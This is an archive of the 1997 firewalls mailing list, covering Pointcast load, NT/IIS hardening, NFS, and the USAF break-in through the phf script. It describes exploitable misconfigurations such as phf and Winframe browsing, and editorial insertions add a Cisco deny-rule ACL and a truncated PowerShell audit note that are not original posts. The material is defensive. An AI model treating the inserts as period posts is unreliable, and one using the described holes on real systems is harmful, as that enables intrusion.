We had the same problem. It turns out that most people simply did not understand the implications of the "all day schedule" option, which claims to be "best for direct internet connections". So, that's what many people chose. Simply informing them helped quite a bit, but we are still considering getting our own Pointcast server. Partly because there is an "early morning slam" on our firewalls, caused by a flood of people coming in, updating Pointcast and reading Dilbert....
===============================================================================
Outside of a dog, a book is a man's best friend. Inside of a dog, it's too dark to read.
PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53

From firewalls-owner Wed Jan 8 05:14:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17135 for firewalls-outgoing; Wed, 8 Jan 1997 05:02:40 -0800 (PST) Received: from hp01.vak12ed.edu (hp01.vak12ed.edu [141.104.150.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA17126 for ; Wed, 8 Jan 1997 05:02:22 -0800 (PST) Message-Id: <199701081302.FAA17126@miles.greatcircle.com> Received: by hp01.vak12ed.edu (1.37.109.20/16.2) id AA126788459; Wed, 8 Jan 1997 08:00:59 -0500 From: "W.C. Epperson" Subject: Re: To Firewall or Not to Firewall? To: cwlim@ncs.com.sg (Henry Lim Chee Wee) Date: Wed, 08 Jan 1997 8:00:59 EST Cc: firewalls@greatcircle.com In-Reply-To: <32D2F4C6.5DA5@ncs.com.sg>; from "Henry Lim Chee Wee" at Jan 08, 97 9:13 am Reply-To: epperson@vak12ed.edu X-Mailer: Elm [revision: 109.18] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Henry could of sed:
>
> IMHO, a firewall is necessary as long as you are not running a
> standalone web server with sole access to the Internet. O'Reilly's
> WebSite is an application program running over a largely insecure
> OS platform that will still allow the purposeful prankster to ruin
> your show for a laugh.
>

Sigh. All together now:

Step 1: risk assessment
Step 2: security policy
Step 3: implementation (including firewall if needed)

Remember the old cartoon with the caption "You guys start coding and I'll go up and see what they want"?

--
W.C. Epperson                    "I have great faith in fools.
Senior SE                         Self-confidence, my friends call it."
Information Security Officer              --Edgar Allan Poe--
DBA Emeritus
Curmudgeon-for-Life
Virginia Dept.
of Education
epperson@pen.k12.va.us

From firewalls-owner Wed Jan 8 05:30:42 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA15502 for firewalls-outgoing; Wed, 8 Jan 1997 04:38:17 -0800 (PST) Received: from NUHUB.DAC.NEU.EDU (nuhub.dac.neu.edu [129.10.1.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA15472 for ; Wed, 8 Jan 1997 04:38:00 -0800 (PST) From: JOHNSON@neu.edu Received: from neu.edu by neu.edu (PMDF V4.3-7 #11963) id <01IDYNDRCOUO99DTTA@neu.edu>; Wed, 8 Jan 1997 07:37:33 EST Date: Wed, 08 Jan 1997 07:37:33 -0500 (EST) Subject: Firewall throughput measurements. To: firewalls@GreatCircle.com Message-id: <01IDYNDREAPU99DTTA@neu.edu> X-Envelope-to: firewalls@GreatCircle.com X-VMS-To: IN%"firewalls@GreatCircle.com" X-VMS-Cc: JOHNSON MIME-version: 1.0 Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

[decloak]

I remember sometime back there were firewall throughput questions concerning what happens if a firewall box is used with high speed links on both sides. In my case I'm thinking 4 or 16 mb token ring on one side and similar links on the other or TR to Ethernet or Ethernet to Ethernet.

The numbers I've seen are measured with a T1 on one side and an Ethernet on the other. In this case the T1 is the throttle and you expect a certain traffic rate. But it was unknown back then what happens in the other cases mentioned above.

Now I expect that there will be a delay more significant than that of a router. A firewall isn't a router; it's a firewall. A great many firewall functions happen at layer 7 while strict routing is a layer 3 issue. So there's more software to plow through generally speaking in a firewall. And I'm sure the numbers will depend on just how much firewalling is going on.

Has anybody done any measurements of what happens when a firewall is used between two high speed links? I'd be very interested in numbers or pointers to same. Thanks.
Chris J.
NU

[recloak]

============================================================================
Chris Johnson                          Internet: johnson@nuhub.dac.neu.edu
Assistant Director, Systems            BITNET: defunct
Division of Academic Computing         Voice: 617.373.3300
Northeastern University, 39RI          FAX: 617.373.8600
360 Huntington Ave.                    50% of all doctors graduated
Boston, MA. U.S.A. 02115               in the lower half of the class
============================================================================

From firewalls-owner Wed Jan 8 05:49:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA16530 for firewalls-outgoing; Wed, 8 Jan 1997 04:52:37 -0800 (PST) Received: from gateway.superonline.net (gateway.superonline.net [194.242.73.254]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA16465 for ; Wed, 8 Jan 1997 04:52:07 -0800 (PST) Received: by gateway.superonline.net; (5.65v3.2/1.3/10May95) id AA12393; Thu, 9 Jan 1997 14:52:47 +0300 Received: by postman.superonline.net with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5) id <01BBFD73.41575750@postman.superonline.net>; Wed, 8 Jan 1997 14:50:14 +0200 Message-Id: From: "A. Ömer Köker" To: "'Firewalls@GreatCircle.COM'" , "'Matthew Patton'" Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 14:50:13 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Interestingly enough this specific hole was described in detail on the latest 2600mag.

now you know they will start reading it...

>----------
>From: Matthew Patton[SMTP:patton@sysnet.net]
>Sent: Wednesday, 8 January 1997 01:09
>To: Firewalls@GreatCircle.COM
>Subject: USAF: how it was hacked
>
>No, this isn't about cdrom based web content.
>
>Really quite anticlimactic.
The infamous phf script was left active on
>the server and was how they got in. Root, the whole 9 yards.
>
>What's really funny is that no more than a week prior to the incident, I
>suggested to ASSIST (the military's equiv of CERT, and now financial
>sponsor of same) that in light of the minor poking around I did on a
>handful of military web sites, that they needed to get the word out to
>admins because so many servers were in a high state of misconfiguration
>and just waiting to be exploited. 7 days later, boom!!
>
>I'm not sure on what grounds people place so much trust in the military
>to do things right with respect to host and network security. I'm sure
>there are segments that do a damn fine job, but seeing the abject lack of
>skills and knowledge in the Pentagon area makes me a mite bit skeptical
>and not a little ashamed. It's a wonder we don't see high profile
>exploits on a routine basis. Don't get me wrong, the private sector
>doesn't have their act together on many fronts as well.
>
>Now hopefully the thread can die in peace.
>

From firewalls-owner Wed Jan 8 05:53:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA18774 for firewalls-outgoing; Wed, 8 Jan 1997 05:40:01 -0800 (PST) Received: from ultra1.dreamscape.com (ultra1.dreamscape.com [206.64.128.7]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA18760 for ; Wed, 8 Jan 1997 05:39:41 -0800 (PST) Received: from bertha (sc21.dreamscape.com [206.114.183.214]) by ultra1.dreamscape.com (8.8.4/8.8.4) with SMTP id IAA04884 for ; Wed, 8 Jan 1997 08:40:19 -0500 (EST) Message-ID: <32D3A3BF.5D36@dreamscape.com> Date: Wed, 08 Jan 1997 08:40:15 -0500 From: "Steven E. Matkoski" Reply-To: uscny8hb@ibmmail.com Organization: Blue Cross Blue Shield of CNY X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: internal filtering router - filter config?
References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Firewalls-Digest wrote:
>
> In your external router you'd block any ICMP traffic going back and
> forth, as well as any packets bearing one of your internal IP addresses,
> as a source address, especially if these are going INTO your protected
> network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
> any ports that your users will not be using, and leave just mail, web,
> ftp, etc.
>
> ricardo
> ralvarado@avantel.com.mx
>

Thanks, I also read that you could block source-routed packets there. If I am using a cisco router, how does one go about this? Or can I get a location for documentation.

Thanks!
-steve.
matkoski@dreamscape.com

From firewalls-owner Wed Jan 8 06:16:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20614 for firewalls-outgoing; Wed, 8 Jan 1997 06:08:53 -0800 (PST) Received: from nucleus.com (nucleus.com [199.45.65.129]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20604 for ; Wed, 8 Jan 1997 06:08:42 -0800 (PST) Received: from geo-x.com (geo-x.com [199.45.65.239]) by nucleus.com (8.8.4/8.8.4) with ESMTP id HAA11956 for ; Wed, 8 Jan 1997 07:08:45 -0700 (MST) Received: from mail.geo-x.com (mail-ppp.geo-x.com [192.168.1.2]) by geo-x.com (8.6.12/8.6.12) with ESMTP id HAA22440 for ; Wed, 8 Jan 1997 07:05:32 -0700 Received: from tstas ([192.2.2.34]) by mail.geo-x.com (8.6.12/8.6.12) with SMTP id HAA12021 for ; Wed, 8 Jan 1997 07:08:22 -0700 Date: Wed, 8 Jan 1997 06:59:10 -0700 (MST) From: Tom Szucs X-Sender: tas@tstas To: firewalls@greatcircle.com Subject: NFS Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

What sort of security issues revolve around running NFS on a network?
Can filesystems be exported securely to a specific host, provided that we can control routes which would prevent spoofed IP addresses from being able to have any data routed back correctly? We are running direct ethernet connections as well as ATM PVCs.

Any assistance would be appreciated and can be sent to me directly. I can post highlights or key points back to the group.

Thanx in advance.

Tom Szucs, Geo-X Systems Ltd.

From firewalls-owner Wed Jan 8 06:29:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21285 for firewalls-outgoing; Wed, 8 Jan 1997 06:17:04 -0800 (PST) Received: from ncept.pt.nce.sita.int (ncept.pt.nce.sita.int [57.7.6.251]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA21228 for ; Wed, 8 Jan 1997 06:16:36 -0800 (PST) Received: from pc_ptdv.pt.nce.sita.int by ncept.pt.nce.sita.int (8.7.3/SitaNet-1.4) id PAA21833; Wed, 8 Jan 1997 15:16:38 +0100 (MET) Date: Wed, 8 Jan 97 15:16:05 PST From: Denis Valois Subject: Re: Firewalls-Digest V6 #8 To: Firewalls@GreatCircle.COM, michael dreves X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1 Content-Transfer-Encoding: 8BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Dear Michael,

As you can see, it is rather unpleasant not to be able to understand a message that is displayed. In future, could you compose your messages in a dialect everyone can understand, or alternatively send said messages only to their legitimate recipients.

Thanks in advance for your understanding and your civic-mindedness,

Denis Valois
Computer Security
SITA (Société Internationale de Télécommunications Aéronautiques)

On Wed, 08 Jan 1997 10:16:14 +0100 michael dreves wrote:
>Hi sweet Sus,
>
>here comes Flemming's new e-mail....there are actually two addresses
>we should try:
>
>drc@drc.baku.az (Danish Refugee Council.
>fdr@drc.baku.az (presumably Flemming)
>
>
>kh.
>
>--
>michael dreves (MD113-RIPE), System Consultant
> Berendsen Data, Phone +45-39577300, Fax +45-39577302
> Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D
>

From firewalls-owner Wed Jan 8 06:49:48 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22304 for firewalls-outgoing; Wed, 8 Jan 1997 06:30:55 -0800 (PST) Received: from radmail.rad.co.il (radmail.rad.co.il [192.114.26.219]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA22244 for ; Wed, 8 Jan 1997 06:30:25 -0800 (PST) Received: from radguard.com ([192.114.26.210]) by radmail.rad.co.il (post.office MTA v1.9.3 ID# 0-12126) with SMTP id AAA18351 for ; Wed, 8 Jan 1997 16:31:57 +0200 Received: by radguard.com (4.1/SMI-4.1) id AA28221; Wed, 8 Jan 97 16:30:34 IST Received: from elgamal.radguard.co.il(192.114.33.2) by gatekeeper.radguard.com via smap (V1.3) id sma028218; Wed Jan 8 16:30:14 1997 Received: from rosebud (boaz.radguard.com) by elgamal.radguard.com (4.1/SMI-4.1) id AA22671; Wed, 8 Jan 97 16:29:12 IST Message-Id: <32D3AED8.4DB7@queenstown.org> Date: Wed, 08 Jan 1997 16:27:36 +0200 From: mike X-Mailer: Mozilla 3.0 (Win95; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1 hacked? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi all

Does anyone know if FW-1 was ever hacked?
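The external-router filter that ricardo's advice (quoted in Steve Matkoski's "internal filtering router" message above) describes, plus the source-route blocking Steve asks about, written out as a classic Cisco IOS configuration. This is an added example, not anything posted to the list; the network 10.1.0.0/16, the host addresses and the interface names are constructed placeholders.

```cisco
! Added example, not from the list. Placeholders: 10.1.0.0/16 is the
! protected network, 10.1.0.25 the mail relay, 10.1.0.80 the web server,
! 10.1.0.21 the ftp server; Serial0 faces the Internet, Ethernet0 the LAN.
!
! Source-routed packets: the router neither forwards nor honours them.
no ip source-route
!
! Inbound filter on the Internet side. Evaluated top to bottom, first
! match wins, implicit "deny ip any any" at the end.
!
! 1. Anti-spoofing: a packet arriving from outside may never carry one
!    of our internal addresses (or loopback) as its source.
access-list 101 deny   ip 10.1.0.0 0.0.255.255 any log
access-list 101 deny   ip 127.0.0.0 0.255.255.255 any log
!
! 2. No ICMP across the perimeter.
access-list 101 deny   icmp any any log
!
! 3. Kill telnet, finger, snmp and snmp trap explicitly (logged so that
!    probes for them show up in the syslog).
access-list 101 deny   tcp any any eq 23 log
access-list 101 deny   tcp any any eq 79 log
access-list 101 deny   udp any any eq 161 log
access-list 101 deny   udp any any eq 162 log
!
! 4. Leave just mail, web and ftp, each only to the host that serves it.
access-list 101 permit tcp any host 10.1.0.25 eq 25
access-list 101 permit tcp any host 10.1.0.80 eq 80
access-list 101 permit tcp any host 10.1.0.21 eq 21
!
! 5. Return traffic for TCP connections opened from inside (ACK/RST set).
!    Internal clients must use passive ftp: an active-mode data connection
!    arrives inbound from port 20 and is not allowed here.
access-list 101 permit tcp any 10.1.0.0 0.0.255.255 established
!
! 6. Make the implicit deny explicit so the drops are logged.
access-list 101 deny   ip any any log
!
interface Serial0
 description Link to the Internet
 ip access-group 101 in
!
! Mirror on the LAN side: nothing leaves us with a foreign source address,
! so our own hosts cannot be used to spoof somebody else.
access-list 102 permit ip 10.1.0.0 0.0.255.255 any
access-list 102 deny   ip any any log
!
interface Ethernet0
 description Protected LAN
 ip access-group 102 in
```

Check the result with "show access-lists", which prints per-entry match counters; a rising count on the anti-spoofing or source-route entries is worth an alert rather than just a log line.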
From firewalls-owner Wed Jan 8 07:01:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA22726 for firewalls-outgoing; Wed, 8 Jan 1997 06:42:52 -0800 (PST) Received: from mail1.acccorp.com ([204.124.88.54]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA22710 for ; Wed, 8 Jan 1997 06:42:39 -0800 (PST) Received: from ccMail by mail1.acccorp.com (IMA Internet Exchange 2.02 Enterprise) id 2D3B3AC0; Wed, 8 Jan 97 09:48:12 -0500 Mime-Version: 1.0 Date: Wed, 8 Jan 1997 09:36:47 -0500 Message-ID: <2D3B3AC0.@acccorp.com> From: KBarlow@acccorp.com (Ken Barlow) Subject: Re: Pointcast To: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike" Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

We too had this problem. We bent to the will of Pointcast and purchased the server software, and it doesn't work as advertised. It's buggy, hard to configure, with many unpublished problems (nevertheless known to some people in Customer Service). It did reduce traffic though. We also shut down the pointcast sites from every internal machine except the pointcast server. I find it's one of those subjects that costs a lot and produces _no_ benefit for the company.

Regards,
Ken B.
ACC Long Distance

______________________________ Reply Separator _________________________________
Subject: Pointcast
Author: "Starkweather; Mike" at Internet
Date: 1/7/97 1:29 PM

I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me.
Mike Starkweather
Anheuser-Busch

From firewalls-owner Wed Jan 8 07:14:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23930 for firewalls-outgoing; Wed, 8 Jan 1997 07:06:36 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA23909 for ; Wed, 8 Jan 1997 07:06:23 -0800 (PST) Message-Id: <199701081506.HAA23909@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A75B878800D4; Wed Jan 08 11:03:55 1997 From: "Jamie Thain" To: "Franke Albert 2 Lt USAFE CSS/SCBS" , "'firewalls@GreatCircle.com'" Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 11:02:14 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Frank,

I might refer your captain to the hacking of the af site that happened a week ago, and some funding might appear. NT properly secured can take some licks, but if it were moi, I would dig up an old 486 with a couple of network cards and put a Linux machine with FWTK in front of it. You must have a UNIX person around. I have to pay the consulting time, and it normally costs me about $1,000 per configuration session, but the software is free.

But, do all that you can to secure the NT machine.

1. Put two network cards in the machine, one inside and one out, and disable the IP routing.
2. Disable the Bindings for Wins to Workstation, Server and NetBios in the bindings to the OUTSIDE card.
3. Under the TCP/IP protocol - Properties - Advanced select Enable Security, then configure the security and allow only TCP port 80 if you are serving Web only. Add other ports for the ports you are serving.
4.
Rename the Administrator account to something else like BigMachineBoss, or even better, Steve Smith (no reference to role).
5. Turn on Auditing.
6. Put the WebServer entirely on a separate drive and give access for the Web server only to that drive.
7. Check the eventvwr security log often.
8. Go to http://www.somarsoft.com and read through the NT security faq.

This is just a start, and others, I am sure, will kick in...

regards:jamie

From firewalls-owner Wed Jan 8 07:34:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA24113 for firewalls-outgoing; Wed, 8 Jan 1997 07:11:04 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA24092 for ; Wed, 8 Jan 1997 07:10:48 -0800 (PST) Message-Id: <199701081510.HAA24092@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id A8517E39002A; Wed Jan 08 11:08:01 1997 From: "Jamie Thain" To: "darren cromer" , "massimo.cotrozzi" Cc: "'xavier fauquet'" , "'les@tracker.demon.co.uk'" , "'firewalls@greatcircle.com'" Subject: Re: Using Remote Workstation as Hole?? Date: Wed, 8 Jan 1997 11:06:20 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Massimo,

You should be able to run Winfile.exe on your winframe and the users should not be able to cause damage. You should not have to use a browser to get there. The idea is to secure the central computer so a single user can use the OS without damaging it. Although I know I can think of ways to damage it, and I am sure students would as well, you can take away most rights of any importance from the client.
It is difficult however to keep them from filling the disk with unwanted files if they have write rights to any directory, as NT does not have a native disk auditor.

regards:jamie

----------
> From: massimo.cotrozzi
> To: darren cromer
> Cc: 'xavier fauquet' ; 'les@tracker.demon.co.uk'; 'firewalls@greatcircle.com'
> Subject: RE: Using Remote Workstation as Hole??
> Date: Wednesday, January 08, 1997 6:04 AM
>
> >
> >On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
> >>Could someone point me to a site explaining to me what
> >>Winframe is?
> >
> >I think ... http://www.cytrix.com ?
> >
> >Winframe is a remote processing system which allows PC clients to run server
> >applications on a Windows system rather than using their own processing
> >power.
> >
> >I think.
> >
> >...Les...
> >
>
> One very nice hole of poor (common) installation of Win Frame is that if you
> let people use browsers (say nt ie 2) on the server side of the connection they
> can just "browse" an executable (say winfile) and ... voilà, a window pops up
> browsing the server from the client ....
> (This one is just a few hits away on your keyboard)
>
> Massimo Cotrozzi
>
> Arthur Andersen - Computer Risk Management
> Computer Security Senior Consultant
> Via della Moscova 3, 20121 Milano
> Tel.
++ 39-2-290371 From firewalls-owner Wed Jan 8 09:23:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA01010 for firewalls-outgoing; Wed, 8 Jan 1997 08:47:04 -0800 (PST) Received: from gatekeeper.mcimail.com (gatekeeper.mcimail.com [192.147.45.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA00961 for ; Wed, 8 Jan 1997 08:46:36 -0800 (PST) Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id QAA08376; Wed, 8 Jan 1997 16:42:58 GMT Received: from mcimail.com by mailgate.mcimail.com id ae29880; 8 Jan 97 16:47 WET Date: Wed, 8 Jan 97 11:46 EST From: Peter Ngo To: drexx , David Wee Cc: firewalls Subject: Re[2]: FW-1 throughput? Etc. Message-Id: <34970108164643/0007044148PJ2EM@MCIMAIL.COM> X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, 1. There is a good white paper of Firewall-1 Performance Testing results based on Sun Ultra 170, Sparc5, and X86 with Solaris 2.5 @ http://CheckPoint.com 2. It does support VPN. There is a VPN patch. 3. Check the home page http://checkpoint.com. Hope this would help, Peter Ngo ______________________________ Reply Separator _________________________________ Subject: Re: FW-1 throughput? Etc. Author: David Wee|INTERNET|David.Wee@singapore.sun.com at MCIMAIL Date: 1/8/97 12:33 AM > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. 
> > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilties of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc. > > > ----- End Included Message ----- > > From firewalls-owner Wed Jan 8 10:19:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04124 for firewalls-outgoing; Wed, 8 Jan 1997 09:38:46 -0800 (PST) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA04117 for ; Wed, 8 Jan 1997 09:38:37 -0800 (PST) Received: from wolverine (wolverine.acquion.com [206.154.17.12]) by magneto.acquion.com (post.office MTA v2.0 0813 ID# 0-11944) with SMTP id AAA299 for ; Wed, 8 Jan 1997 12:43:07 -0500 Message-Id: <2.2.32.19970108174025.00902258@mail.acqic.org> X-Sender: oolid@mail.acqic.org X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 08 Jan 1997 12:40:25 -0500 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Microsoft Rome? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone comment on what the "ms-rome 569/udp #microsoft rome" service is for? 
Regards,
Joe, oolid@acqic.org

From firewalls-owner Wed Jan 8 10:23:07 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02040 for firewalls-outgoing; Wed, 8 Jan 1997 08:59:18 -0800 (PST)
Received: from www.steldyn.com (www.steldyn.com [198.68.45.121]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA02014 for ; Wed, 8 Jan 1997 08:59:01 -0800 (PST)
Received: from juneau.steldyn.com (172.16.31.1) by www.steldyn.com (EMWAC SMTPRS 0.81) with SMTP id ; Wed, 08 Jan 1997 10:05:48 -0700
Received: by juneau.steldyn.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD4A.A17D20C0@juneau.steldyn.com>; Wed, 8 Jan 1997 09:59:26 -0700
Message-ID:
From: Chris Pugrud
To: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list
Subject: RE: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
Date: Wed, 8 Jan 1997 09:59:25 -0700
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This really is not as bad of a situation as it seems. Here are a few pointers to vastly increasing the security of the system. This is not the be all or end all of security. I am sure that there are more steps that you can take to increase your security even more. Buyer Beware. Your mileage may vary...

Apply SP2 for Windows NT 4.0
  SP2 fixes several bugs in the OS and IIS
  http://www.microsoft.com/ntserversupport/Default-SL.HTM

The machine really should be used only for serving web pages. If you can dedicate a singular machine, even a 486, to just tossing HTTP then you can greatly increase the security.

Under Control Panel > Services, only the following MUST be running for a web server:
  EventLog
  FTP Publishing Service (optional)
  Plug and Play (NT 4.0)
  Workstation
  World Wide Web Publishing Service
Only these services should be set "Automatic". All other services should be set "manual." Be careful, your mileage may vary...

Use IIS security
  IIS has some built in allow/deny filtering based on IP address
  Internet Service Manager > WWW Service Properties > Advanced TAB

CGI/BIN is BAD (by default)
  Remove scripts and the HTML Administrator if installed
  Internet Service Manager > Directories
  Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all others, especially any that you can not identify.
  While you are there make sure to go to "logging" and set up logs

Also go to c:\InetPub and set security
  NT Explorer > C:\InetPub > right click > properties > security > permissions
  Replace Permissions on Subdirectories
  Replace Permissions on Existing Files
  Make Everyone Read (RX)(RX)
  Make Administrator Full Control (All)(All)
  Remove all others
This sets things up so that only the administrator can make changes and they must be made from the machine.

Use the OS security
  NT 4.0 has basic packet filtering built in
  Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > Advanced > Enable Security > Configure
  Permit Only (TCP Ports) > Add > 80 (http)
  Permit Only (UDP Ports) > (leave blank)
  Permit Only (IP Protocols) > Add > 6 (TCP)
This really cuts down what the machine can do. If you need to surf from the machine you may need to add 53 to UDP Ports.

While you are in the control panel, also check your bindings:
  Control Panel > Network > Bindings > Show Bindings for "all protocols."
  Make sure that "TCP/IP" is Enabled
  Disable all others
  Show bindings for "all adapters"
  Expand the adapter (click the plus box)
  Expand WINS Client
  You may need to Enable Workstation if the networking will not start on reboot
  If you do, make sure to disable Server and NetBIOS Interface

Restart your computer

Good day and Good luck
Chris

>-----Original Message-----
>From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil]
>Sent: Wednesday, January 08, 1997 3:52 AM
>To: Firewalls Mailing list
>Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
>
>I am responsible for securing (as well as I can) a DEC Alpha running
>Windows NT 4.0 and Internet Information Server as our WWW Server. It is
>sitting as a node on our LAN and everyone in the world can access it. I
>want a program that I can run on it that will allow/disallow blocks of
>IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but
>not as necessary) it to keep detailed logs. I have heard of O'Reilly's
>WebSite, but I don't know if this will do. I do not have funding for an
>expensive firewall machine, and it is impractical to add routers into
>our LAN. Please help if you have any suggestions. Thanks.
>
>albert.franke@ramstein.af.mil
>Albert E.
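[Editor's note, not part of any post on this list.] Chris's message above, and Jamie's earlier list (auditing on, the built-in Administrator renamed, web content on its own volume), describe the hardening as NT 4.0 GUI steps. The script below is an added example of the same checks as a read-only audit on a current Windows Server: it reports services set to start automatically outside an allow-list, principals with write access to the web root, inbound firewall allow rules other than TCP/80, adapter bindings other than IPv4, and whether the RID-500 account is still called Administrator. It assumes PowerShell 5.1 or later, the NetSecurity and NetAdapter modules, and an elevated session; the service allow-list and web root path are constructed values to adjust for your own machine.

```powershell
# Editor-added audit script, not from the original post. Assumes Windows
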